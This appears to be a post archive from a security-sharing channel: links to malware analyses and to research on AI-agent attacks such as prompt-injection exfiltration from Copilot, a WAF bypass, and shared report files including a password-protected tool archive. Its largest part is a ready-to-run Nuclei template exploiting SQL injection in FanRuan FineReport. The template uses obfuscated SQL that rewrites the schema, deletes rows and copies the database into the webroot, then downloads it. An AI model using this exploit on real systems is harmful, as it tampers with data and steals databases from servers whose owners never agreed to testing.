Information Security, Penetration, Attack and Defense, Vulnerability Sharing

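Information security, penetration testing, computer network security, attack and defense techniques, vulnerability analysis and research, hacker resource sharing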

946 subscribers (+3 in 24 hours, +11 in 7 days, +26 in 30 days)
Post archive
2025年度全球APT威胁研究报告.pdf (2025 Global APT Threat Research Report), 10.50 MB

#CyberSecurity #KnowledgeSharing #Security #SecurityResearch #SecuritySharing #AI #AISecurity
1. Decoding malware C2 servers with CyberChef
   https://www.netresec.com/?page=Blog&month=2026-01&post=Decoding-malware-C2-with-CyberChef
2. VoidLink: evidence that the era of advanced AI-generated malware has arrived
   https://research.checkpoint.com/2026/voidlink-early-ai-generated-malware-framework
3. SolyxImmortal: Python malware analysis
   https://www.cyfirma.com/research/solyximmortal-python-malware-analysis
4. From extension to infection: an in-depth analysis of the Evelyn Stealer campaign targeting software developers
   https://www.trendmicro.com/es_es/research/26/a/analysis-of-the-evelyn-stealer-campaign.html

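#Exploitation #SecurityResearch #Security #KnowledgeSharing #CyberSecurity
1. Reprompt: a single-click Microsoft Copilot attack that silently steals your personal data
   // The attack uses the q URL parameter, a double-request technique, and a chain-request method to inject malicious prompts, perform repeated actions, and establish a persistent data-exfiltration chain.
   Link: https://www.varonis.com/blog/reprompt
2. Lack of isolation in agentic browsers resurfaces old vulnerabilities
   // Agentic browsers lack proper isolation, which leads to vulnerabilities such as XSS and CSRF and in turn to data leakage, prompt injection, and session hijacking, so system-level security measures and an extended origin policy are needed.
   Link: https://blog.trailofbits.com/2026/01/13/lack-of-isolation-in-agentic-browsers-resurfaces-old-vulnerabilities/
3. Clang hardening cheat sheet
   // This article reviews the past ten years of Clang hardening techniques, focusing on new compiler flags and hardware-assisted protections against modern threats such as ROP, JOP, and speculative attacks.
   https://blog.quarkslab.com/clang-hardening-cheat-sheet-ten-years-later.html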

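#SecuritySharing #TechSharing #KnowledgeSharing #CyberSecurity #TechnicalAnalysis #SecurityResearch #Security
A critical zero-day vulnerability in Cloudflare's Web Application Firewall (WAF) allows attackers to bypass security controls and reach protected origin servers directly through the certificate validation path.
https://fearsoff.org/research/cloudflare-acme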

The password is the tool name in lowercase.

GhostLeak.zip, 6.98 MB

n8n_远程代码执行漏洞CVE-2026-21858应急响应通告.pdf (n8n remote code execution vulnerability CVE-2026-21858 emergency response advisory), 4.97 KB

从头训练大型语言模型的最佳实践.pdf (Best practices for training large language models from scratch), 2.37 MB

2026传统AI测试与生成AI测试:一种实用的黑客攻击方法.pdf (2026 Traditional AI testing vs. generative AI testing: a practical hacking approach), 15.79 MB

2024欧洲网络安全演习事后报告.pdf (2024 European cybersecurity exercise after-action report), 8.06 KB

加壳——安服仔睡前故事篇.pdf (Packing: a bedtime story for security service engineers), 2.98 KB

华天OA代码审计参考文档.docx (Huatian OA code audit reference document), 10.09 KB

#PenetrationTesting #TechSharing #SecuritySharing

id: FineReport-exportexcel-sqli
info:
  name: FineReport-exportexcel-sqli
  author: sibei
  severity: high
  tags: FineReport
http:
  - raw:
      - |
        GET /webroot/ReportServer HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
        viewlets: [{'reportlet':'/'}]
        op: getSessionID
    extractors:
      - type: regex
        part: body
        name: id_upload
        internal: true
        regex:
          - "[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}"
  - raw:
      - |+
        GET /webroot/decision/nx/report/v9/largedataset/export/excel?functionParams=%7b%7d&__parameters__=%7b%7d HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:145.0) Gecko/20100101 Firefox/145.0
        sessionID: {{id_upload}}
        params: %3Cpd%3E%0A+%3CLargeDatasetExcelExportJS+dsName%3D%221%22%3E%0A%3CParameters%3E%3CParameter%3E%0A%3CAttributes+name%3D%22c%22%2F%3E%3CO+t%3D%22Formula%22%3E%3CAttributes%3E%3C%21%5BCDATA%5Bsql%28%27FRDemo%27%2CCONCATENATE%28%22pr%22%2C%22agm%22%2C%22a+wr%22%2C%22i%22%2C%22t%22%2C%22a%22%2C%22ble%22%2C%22_sch%22%2C%22e%22%2C%22ma%3Do%22%2C%22n%22%29%2C1%29-sql%28%27FRDemo%27%2CCONCATENATE%28%22dele%22%2C%22t%22%2C%22e+f%22%2C%22r%22%2C%22o%22%2C%22m+sq%22%2C%22li%22%2C%22t%22%2C%22e_sc%22%2C%22he%22%2C%22ma+w%22%2C%22here%22%2C%22+na%22%2C%22m%22%2C%22e%21%22%2C%22%3D%22%2C%22%27s%22%2C%22ql%22%2C%22ite%22%2C%22_s%22%2C%22ta%22%2C%22t%22%2C%221%27%22%29%2C1%29-sql%28%27FRDemo%27%2CCONCATENATE%28%22an%22%2C%22aly%22%2C%22ze%22%29%2C1%29-sql%28%27FRDemo%27%2CCONCATENATE%28%22re%22%2C%22p%22%2C%22lac%22%2C%22e+i%22%2C%22nto%22%2C%22+s%22%2C%22ql%22%2C%22ite_%22%2C%22st%22%2C%22at%22%2C%221+va%22%2C%22lu%22%2C%22es%28%27%22%2C%22%27%2C%27123%22%2C%22%27%22%2C%22%29%22%29%2C1%29-sql%28%27FRDemo%27%2CCONCATENATE%28%22V%22%2C%22A%22%2C%22C%22%2C%22U%22%2C%22U%22%2C%22M%22%2C%22+i%22%2C%22nt%22%2C%22o%28%27%22%2CENV_HOME%2C%22%2F%22%2C%22.%22%2C%22.%22%2C%22%2F%22%2C%22.%22%2C%22%2F%22%2C%22{{randstr}}%22%2C%22.%22%2C%22t%22%2C%22x%22%2C%22t%22%2C%22%27%29%22%29%2C1%29%5D%5D%3E%3C%2FAttributes%3E%3C%2FO%3E%3C%2FParameter%3E%3C%2FParameters%3E%3C%2FLargeDatasetExcelExportJS%3E%3C%2Fpd%3E

  - raw:
      - |
        GET /webroot/{{randstr}}.txt HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "SQLite format"
      - type: status
        status:
          - 200
SQL injection vulnerability in the export/excel endpoint of FanRuan FineReport

lyra超级提示词.md (Lyra super prompt), 0.03 KB

OWASP-Top-10-for-Agentic-Applications-2026-12.6-1.pdf, 1.22 MB